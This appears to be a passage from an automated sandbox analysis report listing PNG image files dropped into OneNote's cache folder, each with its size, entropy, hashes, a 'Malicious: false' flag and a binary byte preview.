Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
